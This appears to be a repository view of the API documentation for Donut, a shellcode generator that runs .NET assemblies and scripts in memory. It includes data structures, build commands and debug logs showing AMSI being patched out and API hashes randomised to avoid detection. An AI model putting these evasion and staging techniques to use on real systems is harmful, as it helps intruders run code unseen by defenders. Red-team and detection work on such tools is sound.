224 <span style='color:#603000; '>GUID</span> xIID_IHost<span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript object</span>
225 <span style='color:#603000; '>GUID</span> xIID_IActiveScript<span style='color:#800080; '>;</span> <span style='color:#696969; '>// engine</span>
226 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptSite<span style='color:#800080; '>;</span> <span style='color:#696969; '>// implementation</span>
227 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse32<span style='color:#800080; '>;</span> <span style='color:#696969; '>// parser</span>
228 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse64<span style='color:#800080; '>;</span>
229
230 <span style='color:#696969; '>// GUID required to run XSL files</span>
231 <span style='color:#603000; '>GUID</span> xCLSID_DOMDocument30<span style='color:#800080; '>;</span>
232 <span style='color:#603000; '>GUID</span> xIID_IXMLDOMDocument<span style='color:#800080; '>;</span>
233 <span style='color:#603000; '>GUID</span> xIID_IXMLDOMNode<span style='color:#800080; '>;</span>
234
235 <span style='color:#800000; font-weight:bold; '>int</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL </span>
236
237 <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span>
238 <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// staging server hosting donut module</span>
239 <span style='color:#800000; font-weight:bold; '>char</span> req<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// just a buffer for "GET"</span>
240 <span style='color:#800080; '>}</span> http<span style='color:#800080; '>;</span>
241
242 uint8_t sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string to hash</span>
243 uint64_t mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption ok</span>
244
245 DONUT_CRYPT mod_key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// used to decrypt module</span>
246 uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of module</span>
247
248 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
249 PDONUT_MODULE p<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for URL</span>
250 DONUT_MODULE x<span style='color:#800080; '>;</span> <span style='color:#696969; '>// for PIC</span>
251 <span style='color:#800080; '>}</span> module<span style='color:#800080; '>;</span>
252 <span style='color:#800080; '>}</span> DONUT_INSTANCE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_INSTANCE<span style='color:#800080; '>;</span>
253 </pre>
254
255 <h3>Module</h3>
256
257 <p>Modules can be embedded in an <var>Instance</var> or stored on a remote HTTP server.</p>
258
259 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for a module goes in the following structure</span>
260 <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_MODULE <span style='color:#800080; '>{</span>
261 <span style='color:#603000; '>DWORD</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// EXE, DLL, JS, VBS, XSL</span>
262 <span style='color:#603000; '>WCHAR</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version for .NET EXE/DLL</span>
263 <span style='color:#603000; '>WCHAR</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// domain name to use for .NET EXE/DLL</span>
264 <span style='color:#603000; '>WCHAR</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace for .NET EXE/DLL</span>
265 <span style='color:#603000; '>WCHAR</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to invoke for .NET DLL or api for unmanaged DLL</span>
266 <span style='color:#603000; '>DWORD</span> param_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// number of parameters for DLL/EXE</span>
267 <span style='color:#603000; '>WCHAR</span> param<span style='color:#808030; '>[</span>DONUT_MAX_PARAM<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters for DLL/EXE</span>
268 <span style='color:#603000; '>CHAR</span> sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// random string to verify decryption</span>
269 ULONG64 mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption was ok</span>
270 ULONG64 len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of EXE/DLL/XSL/JS/VBS file</span>
271 <span style='color:#603000; '>BYTE</span> data<span style='color:#808030; '>[</span><span style='color:#008c00; '>4</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// data of EXE/DLL/XSL/JS/VBS file</span>
272 <span style='color:#800080; '>}</span> DONUT_MODULE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_MODULE<span style='color:#800080; '>;</span>
273 </pre>
274
275 <h3>API Hashing</h3>
276
277 <p>A hash function called <em>Maru</em> is used to resolve the address of API at runtime. It uses a Davies-Meyer construction and the SPECK block cipher to derive a 64-bit hash from an API string. The padding is similar to what's used by MD4 and MD5 except only 32-bits of the string length are stored in the buffer instead of 64-bits. An initial value (IV) chosen randomly ensures the 64-bit API hashes are unique for each instance and cannot be used for detection of Donut. Future releases will likely support alternative methods of resolving address of API to decrease chance of detection.</p>
278
279 <h3>Encryption</h3>
280
281 <p>The following structure is used to hold a master key, counter and nonce for Donut, which are generated randomly.</p>
282
283 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CRYPT <span style='color:#800080; '>{</span>
284 <span style='color:#603000; '>BYTE</span> mk<span style='color:#808030; '>[</span>DONUT_KEY_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// master key</span>
285 <span style='color:#603000; '>BYTE</span> ctr<span style='color:#808030; '>[</span>DONUT_BLK_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// counter + nonce</span>
286 <span style='color:#800080; '>}</span> DONUT_CRYPT<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CRYPT<span style='color:#800080; '>;</span>
287 </pre>
288
289 <p>Chaskey, a 128-bit block cipher with support for 128-bit keys, is used in Counter (CTR) mode to decrypt a <var>Module</var> or an <var>Instance</var> at runtime. If an adversary discovers a staging server, it should not be feasible for them to decrypt a donut module without the key which is stored in the donut payload. </p>
290
291 <h3>Debugging payload</h3>
292
293 <p>The payload is capable of displaying detailed information about each step executing a file in-memory and can be useful in tracking down bugs. To build a debug-enabled executable, specify the debug label with nmake/make for both donut.c and payload.c.</p>
294
295 <pre>
296 nmake debug -f Makefile.msvc
297 make debug -f Makefile.mingw
298 </pre>
299
300 <p>Use donut to create a payload as you normally would and a file called <code>instance</code> will be saved to disk.</p>
301
302 <pre>
303 c:\hub\donut>donut -fClass1.dll -cTestClass -mRunProcess -pcalc.exe,notepad.exe
304
305 [ Donut shellcode generator v0.9.2
306 [ Copyright (c) 2019 TheWover, Odzhan
307
308 DEBUG: donut.c:822:DonutCreate(): Entering.
309 DEBUG: donut.c:824:DonutCreate(): Validating configuration and path of file
310 DEBUG: donut.c:840:DonutCreate(): Validating instance type
311 DEBUG: donut.c:880:DonutCreate(): Validating architecture
312 DEBUG: donut.c:277:get_file_info(): Entering.
313 DEBUG: donut.c:286:get_file_info(): Checking extension of Class1.dll
314 DEBUG: donut.c:293:get_file_info(): Extension is ".dll"
315 DEBUG: donut.c:320:get_file_info(): Module is DLL
316 DEBUG: donut.c:327:get_file_info(): Mapping Class1.dll into memory
317 DEBUG: donut.c:222:map_file(): Reading size of file : Class1.dll
318 DEBUG: donut.c:231:map_file(): Opening Class1.dll
319 DEBUG: donut.c:241:map_file(): Mapping 3072 bytes for Class1.dll
320 DEBUG: donut.c:336:get_file_info(): Checking DOS header
321 DEBUG: donut.c:342:get_file_info(): Checking NT header
322 DEBUG: donut.c:348:get_file_info(): Checking IMAGE_DATA_DIRECTORY
323 DEBUG: donut.c:356:get_file_info(): Checking characteristics
324 DEBUG: donut.c:368:get_file_info(): COM Directory found
325 DEBUG: donut.c:384:get_file_info(): Runtime version : v4.0.30319
326 DEBUG: donut.c:395:get_file_info(): Leaving.
327 DEBUG: donut.c:944:DonutCreate(): Creating module
328 DEBUG: donut.c:516:CreateModule(): Entering.
329 DEBUG: donut.c:520:CreateModule(): Allocating 9504 bytes of memory for DONUT_MODULE
330 DEBUG: donut.c:544:CreateModule(): Domain : TPYTXT7T
331 DEBUG: donut.c:549:CreateModule(): Class : TestClass
332 DEBUG: donut.c:552:CreateModule(): Method : RunProcess
333 DEBUG: donut.c:559:CreateModule(): Runtime : v4.0.30319
334 DEBUG: donut.c:584:CreateModule(): Adding "calc.exe"
335 DEBUG: donut.c:584:CreateModule(): Adding "notepad.exe"
336 DEBUG: donut.c:610:CreateModule(): Leaving.
337 DEBUG: donut.c:951:DonutCreate(): Creating instance
338 DEBUG: donut.c:621:CreateInstance(): Entering.
339 DEBUG: donut.c:624:CreateInstance(): Allocating space for instance
340 DEBUG: donut.c:631:CreateInstance(): The size of module is 9504 bytes. Adding to size of instance.
341 DEBUG: donut.c:643:CreateInstance(): Generating random key for instance
342 DEBUG: donut.c:649:CreateInstance(): Generating random key for module
343 DEBUG: donut.c:655:CreateInstance(): Generating random string to verify decryption
344 DEBUG: donut.c:661:CreateInstance(): Generating random IV for Maru hash
345 DEBUG: donut.c:666:CreateInstance(): Generating hashes for API using IV: 59e4ea34bad26f10
346 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : LoadLibraryA = 710C9DA8846AE821
347 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetProcAddress = 2334B1630D3B9C85
348 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetModuleHandleA = 5389E01382E0391
349 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualAlloc = 51EE6B0DB215095E
350 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualFree = F55A2169F30A6ED4
351 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualQuery = 22DB7628044F6E32
352 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : VirtualProtect = 688AA07FEF250016
353 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : Sleep = 5BF1C1B408CCA4A5
354 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : MultiByteToWideChar = 438AD242BBBC755
355 DEBUG: donut.c:679:CreateInstance(): Hash for kernel32.dll : GetUserDefaultLCID = 33ED1B2C1A2F9EC7
356 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreate = 78AD2BFB55A5E7ED
357 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayCreateVector = 539F6582DE26F7BC
358 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayPutElement = 5057AD641F749DA0
359 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayDestroy = A63C510FF032080E
360 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetLBound = A37979CE2EEDDA6
361 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SafeArrayGetUBound = 64A9C62452B8653C
362 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysAllocString = BFEEAAB6CE6017FB
363 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : SysFreeString = E6FD34B03A2701F6
364 DEBUG: donut.c:679:CreateInstance(): Hash for oleaut32.dll : LoadTypeLib = 2A33214873ADC58C
365 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCrackUrlA = 1ADE3553184C68E1
366 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetOpenA = 1DEDE3D32F2FCD3
367 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetConnectA = 781FD6B18C99CAD2
368 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetSetOptionA = 13EC8A292778FC3F
369 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetReadFile = 8D16E60E7C2E582A
370 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : InternetCloseHandle = C28E8A3AABB2A755
371 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpOpenRequestA = 6C5189610A8545F5
372 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpSendRequestA = 4DFA0D985988D31
373 DEBUG: donut.c:679:CreateInstance(): Hash for wininet.dll : HttpQueryInfoA = ED09A37256B27F04
374 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CorBindToRuntime = FD669FABED4C6B7
375 DEBUG: donut.c:679:CreateInstance(): Hash for mscoree.dll : CLRCreateInstance = 56B7AC5C110570B5
376 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoInitializeEx = 3733F4734D12D7C
377 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoCreateInstance = FCB3EAC51E43319B
378 DEBUG: donut.c:679:CreateInstance(): Hash for ole32.dll : CoUninitialize = 908A347B45C6E4A2
379 DEBUG: donut.c:694:CreateInstance(): Copying GUID structures and DLL strings for loading .NET assemblies
380 DEBUG: donut.c:791:CreateInstance(): Copying module data to instance
381 DEBUG: donut.c:796:CreateInstance(): encrypting instance
382 DEBUG: donut.c:808:CreateInstance(): Leaving.
383 DEBUG: donut.c:959:DonutCreate(): Saving instance to file
384 DEBUG: donut.c:992:DonutCreate(): PIC size : 33050
385 DEBUG: donut.c:999:DonutCreate(): Inserting opcodes
386 DEBUG: donut.c:1035:DonutCreate(): Copying 15218 bytes of x86 + amd64 shellcode
387 DEBUG: donut.c:259:unmap_file(): Unmapping
388 DEBUG: donut.c:262:unmap_file(): Closing
389 DEBUG: donut.c:1061:DonutCreate(): Leaving.
390 [ Instance type : PIC
391 [ Module file : "Class1.dll"
392 [ File type : .NET DLL
393 [ Class : TestClass
394 [ Method : RunProcess
395 [ Parameters : calc.exe,notepad.exe
396 [ Target CPU : x86+AMD64
397 [ Shellcode : "payload.bin"
398
399 DEBUG: donut.c:1069:DonutDelete(): Entering.
400 DEBUG: donut.c:1088:DonutDelete(): Leaving.
401 </pre>
402
403 <p>Pass the instance as a parameter to payload.exe and it will run on the host system as if in a target environment.</p>
404
405 <pre>
406 c:\hub\donut\payload>payload ..\instance
407 Running...
408 DEBUG: payload.c:45:ThreadProc(): Maru IV : 1899033E0863343E
409 DEBUG: payload.c:48:ThreadProc(): Resolving address for VirtualAlloc() : 9280348A6A2AFA7
410 DEBUG: payload.c:52:ThreadProc(): Resolving address for VirtualAlloc() : 3A49032E4107D985
411 DEBUG: payload.c:61:ThreadProc(): VirtualAlloc : 77535ED0 VirtualFree : 77535EF0
412 DEBUG: payload.c:63:ThreadProc(): Allocating 17800 bytes of RW memory
413 DEBUG: payload.c:70:ThreadProc(): Copying 17800 bytes of data to memory 008D0000
414 DEBUG: payload.c:74:ThreadProc(): Zero initializing PDONUT_ASSEMBLY
415 DEBUG: payload.c:82:ThreadProc(): Decrypting 17800 bytes of instance
416 DEBUG: payload.c:89:ThreadProc(): Generating hash to verify decryption
417 DEBUG: payload.c:91:ThreadProc(): Instance : c16c69caa83fb13f | Result : c16c69caa83fb13f
418 DEBUG: payload.c:98:ThreadProc(): Resolving LoadLibraryA
419 DEBUG: payload.c:104:ThreadProc(): Loading ole32.dll ...
420 DEBUG: payload.c:104:ThreadProc(): Loading oleaut32.dll ...
421 DEBUG: payload.c:104:ThreadProc(): Loading wininet.dll ...
422 DEBUG: payload.c:104:ThreadProc(): Loading mscoree.dll ...
423 DEBUG: payload.c:108:ThreadProc(): Resolving 33 API
424 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 066A0ED9815D3C92
425 DEBUG: payload.c:111:ThreadProc(): Resolving API address for F3569749C64E1DA5
426 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09280348A6A2AFA7
427 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3A49032E4107D985
428 DEBUG: payload.c:111:ThreadProc(): Resolving API address for FDE50FEB629EB834
429 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4A4C764EFA89A84F
430 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5D388BA18E017E53
431 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 4EA2B25D8FAABD2B
432 DEBUG: payload.c:111:ThreadProc(): Resolving API address for F1D278132E49F050
433 DEBUG: payload.c:111:ThreadProc(): Resolving API address for D05386A0F8FF7CAD
434 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8121B63764A390A6
435 DEBUG: payload.c:111:ThreadProc(): Resolving API address for EB2BFAA408124470
436 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 11B666F77E7303F6
437 DEBUG: payload.c:111:ThreadProc(): Resolving API address for E8BD6B7A99981E38
438 DEBUG: payload.c:111:ThreadProc(): Resolving API address for DE78E211DE61998B
439 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 09D967C5479A0F9F
440 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6CA1D167C2BFFA9A
441 DEBUG: payload.c:111:ThreadProc(): Resolving API address for AD11F6324A205C5E
442 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 5EAEF345362A2811
443 DEBUG: payload.c:111:ThreadProc(): Resolving API address for A0CC0DC36E8EDD2C
444 DEBUG: payload.c:111:ThreadProc(): Resolving API address for A4241EDCC8B14F85
445 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 756CEB8FF481A72E
446 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 8116A255193A09CA
447 DEBUG: payload.c:111:ThreadProc(): Resolving API address for AB14A786531404A1
448 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 1CF4A93D6896380A
449 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 61B393CC2DE33733
450 DEBUG: payload.c:111:ThreadProc(): Resolving API address for ADAF62D44179684A
451 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 7F9591B7380CD749
452 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 3CC76B29D676544F
453 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 725AA978FD2B1255
454 DEBUG: peb.c:87:FindExport(): 725aa978fd2b1255 is forwarded to api-ms-win-core-com-l1-1-0.CoInitializeEx
455 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
456 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoInitializeEx)
457 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 6C0F670F3C85A407
458 DEBUG: peb.c:87:FindExport(): 6c0f670f3c85a407 is forwarded to api-ms-win-core-com-l1-1-0.CoCreateInstance
459 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
460 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoCreateInstance)
461 DEBUG: payload.c:111:ThreadProc(): Resolving API address for 2996694CA69B44E8
462 DEBUG: peb.c:87:FindExport(): 2996694ca69b44e8 is forwarded to api-ms-win-core-com-l1-1-0.CoUninitialize
463 DEBUG: peb.c:110:FindExport(): Trying to load api-ms-win-core-com-l1-1-0.dll
464 DEBUG: peb.c:114:FindExport(): Calling GetProcAddress(CoUninitialize)
465 DEBUG: payload.c:127:ThreadProc(): Using module embedded in instance
466 DEBUG: inmem_dotnet.c:43:LoadAssembly(): Using module embedded in instance
467 DEBUG: inmem_dotnet.c:51:LoadAssembly(): CLRCreateInstance
468 DEBUG: inmem_dotnet.c:59:LoadAssembly(): ICLRMetaHost::GetRuntime("v4.0.30319")
469 DEBUG: inmem_dotnet.c:66:LoadAssembly(): ICLRRuntimeInfo::IsLoadable
470 DEBUG: inmem_dotnet.c:70:LoadAssembly(): ICLRRuntimeInfo::GetInterface
471 DEBUG: inmem_dotnet.c:78:LoadAssembly(): HRESULT: 00000000
472 DEBUG: inmem_dotnet.c:100:LoadAssembly(): ICorRuntimeHost::Start
473 DEBUG: inmem_dotnet.c:107:LoadAssembly(): ICorRuntimeHost::CreateDomain("TP7WFT9M")
474 DEBUG: inmem_dotnet.c:115:LoadAssembly(): IUnknown::QueryInterface
475 DEBUG: bypass.c:83:DisableAMSI(): Length of AmsiScanBuffer stub is 32 bytes.
476 DEBUG: bypass.c:89:DisableAMSI(): Overwriting AmsiScanBuffer
477 DEBUG: bypass.c:104:DisableAMSI(): Length of AmsiScanString stub is -16 bytes.
478 DEBUG: inmem_dotnet.c:123:LoadAssembly(): DisableAMSI OK
479 DEBUG: inmem_dotnet.c:127:LoadAssembly(): DisableWLDP OK
480 DEBUG: inmem_dotnet.c:134:LoadAssembly(): Copying 3072 bytes of assembly to safe array
481 DEBUG: inmem_dotnet.c:140:LoadAssembly(): AppDomain::Load_3
482 DEBUG: inmem_dotnet.c:147:LoadAssembly(): HRESULT : 00000000
483 DEBUG: inmem_dotnet.c:149:LoadAssembly(): Erasing assembly from memory
484 DEBUG: inmem_dotnet.c:155:LoadAssembly(): SafeArrayDestroy
485 DEBUG: inmem_dotnet.c:176:RunAssembly(): Using module embedded in instance
486 DEBUG: inmem_dotnet.c:184:RunAssembly(): Type is DLL
487 DEBUG: inmem_dotnet.c:255:RunAssembly(): SysAllocString("TestClass")
488 DEBUG: inmem_dotnet.c:259:RunAssembly(): SysAllocString("RunProcess")
489 DEBUG: inmem_dotnet.c:263:RunAssembly(): Assembly::GetType_2
490 DEBUG: inmem_dotnet.c:269:RunAssembly(): SafeArrayCreateVector(2 parameter(s))
491 DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "calc.exe" as parameter 1
492 DEBUG: inmem_dotnet.c:276:RunAssembly(): Adding "notepad.exe" as parameter 2
493 DEBUG: inmem_dotnet.c:292:RunAssembly(): Calling Type::InvokeMember_3
494 DEBUG: inmem_dotnet.c:306:RunAssembly(): Type::InvokeMember_3 : 00000000 : Success
495 DEBUG: inmem_dotnet.c:323:FreeAssembly(): Type::Release
496 DEBUG: inmem_dotnet.c:335:FreeAssembly(): Assembly::Release
497 DEBUG: inmem_dotnet.c:341:FreeAssembly(): AppDomain::Release
498 DEBUG: inmem_dotnet.c:347:FreeAssembly(): IUnknown::Release
499 DEBUG: inmem_dotnet.c:353:FreeAssembly(): ICorRuntimeHost::Stop
500 DEBUG: inmem_dotnet.c:356:FreeAssembly(): ICorRuntimeHost::Release
501 DEBUG: inmem_dotnet.c:362:FreeAssembly(): ICLRRuntimeInfo::Release
502 DEBUG: inmem_dotnet.c:368:FreeAssembly(): ICLRMetaHost::Release
503 DEBUG: payload.c:171:ThreadProc(): Erasing RW memory for instance
504 DEBUG: payload.c:174:ThreadProc(): Releasing RW memory for instance
505 </pre>
506
507 <p>Obviously you should be cautious with what files you decide to execute on your machine.</p>
508
509 </body>
510 </html>
+0
-511
docs/api.md less more
0
1 <html>
2 <body>
3
4 <h3>API</h3>
5
6 <ul>
7 <li><code>int DonutCreate(PDONUT_CONFIG pConfig)</code></li>
8 <li><code>int DonutDelete(PDONUT_CONFIG pConfig)</code></li>
9 </ul>
10
11 <p>When provided with a valid configuration, <code>DonutCreate</code> will generate a shellcode to execute a VBS/JS/EXE/DLL or XSL files in-memory. If the function returns <code>DONUT_ERROR_SUCCESS</code>, the configuration will contain three components:</p>
12
13 <ol>
14 <li>An encrypted <var>Instance</var></li>
15 <li>An encrypted <var>Module</var></li>
16 <li>A position-independent code (PIC) or shellcode with <var>Instance</var> embedded in it.</li>
17 </ol>
18
19 <p>The key to decrypt the <var>Module</var> is stored in the <var>Instance</var> so that if a module is discovered on a staging server by an adversary, it should not be possible to decrypt the contents without the instance. <code>DonutDelete</code> will release any memory allocated by a successful call to <code>DonutCreate</code>. The <var>Instance</var> will already be attached to the PIC ready for executing in-memory, but the module may require saving to disk if the PIC will retrieve it from a remote staging server.</p>
20
21 <h3>Configuration</h3>
22
23 <p>A configuration requires a target architecture (only x86 and x86-64 are currently supported), a path to a VBS/JS/EXE/DLL or XML file that will be executed in-memory by the shellcode, a namespace/class for a .NET assembly, including the name of a method to invoke and any parameters passed to the method. If the module will be stored on a staging server, a URL is required, but not a module name because that will be generated randomly.</p>
24
25 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CONFIG <span style='color:#800080; '>{</span>
26 <span style='color:#800000; font-weight:bold; '>int</span> arch<span style='color:#800080; '>;</span> <span style='color:#696969; '>// target architecture for shellcode </span>
27 <span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of domain to create for assembly</span>
28 <span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace</span>
29 <span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to execute</span>
30 <span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span><span style='color:#808030; '>(</span>DONUT_MAX_PARAM<span style='color:#808030; '>+</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#808030; '>*</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters passed to method, separated by comma or semi-colon</span>
31 <span style='color:#800000; font-weight:bold; '>char</span> file<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// assembly to create module from </span>
32 <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to root path of where module will be on remote http server</span>
33 <span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version to use.</span>
34 <span style='color:#800000; font-weight:bold; '>char</span> modname<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of module written to disk</span>
35
36 <span style='color:#800000; font-weight:bold; '>int</span> mod_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// .NET EXE/DLL, VBS,JS,EXE,DLL,XSL</span>
37 uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_MODULE</span>
38 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>mod<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut module</span>
39
40 <span style='color:#800000; font-weight:bold; '>int</span> inst_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL</span>
41 uint64_t inst_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_INSTANCE</span>
42 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>inst<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut instance</span>
43
44 uint64_t pic_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of shellcode</span>
45 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>pic<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to PIC/shellcode</span>
46 <span style='color:#800080; '>}</span> DONUT_CONFIG<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CONFIG<span style='color:#800080; '>;</span>
47 </pre>
48
49 <table border="1">
50 <tr>
51 <th>Member</th>
52 <th>Description</th>
53 </tr>
54 <tr>
55 <td><code>arch</code></td>
56 <td>Indicates the type of assembly code to generate. <code>DONUT_ARCH_X86</code> and <code>DONUT_ARCH_X64</code> are self-explanatory. <code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both x86 and amd64. ARM64 will be supported at some point.</td>
57 </tr>
58 <tr>
59 <td><code>domain</code></td>
60 <td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly.</td>
61 </tr>
62 <tr>
63 <td><code>cls</code></td>
64 <td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</var></td>
65 </tr>
66 <tr>
67 <td><code>method</code></td>
68 <td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td>
69 </tr>
70 <tr>
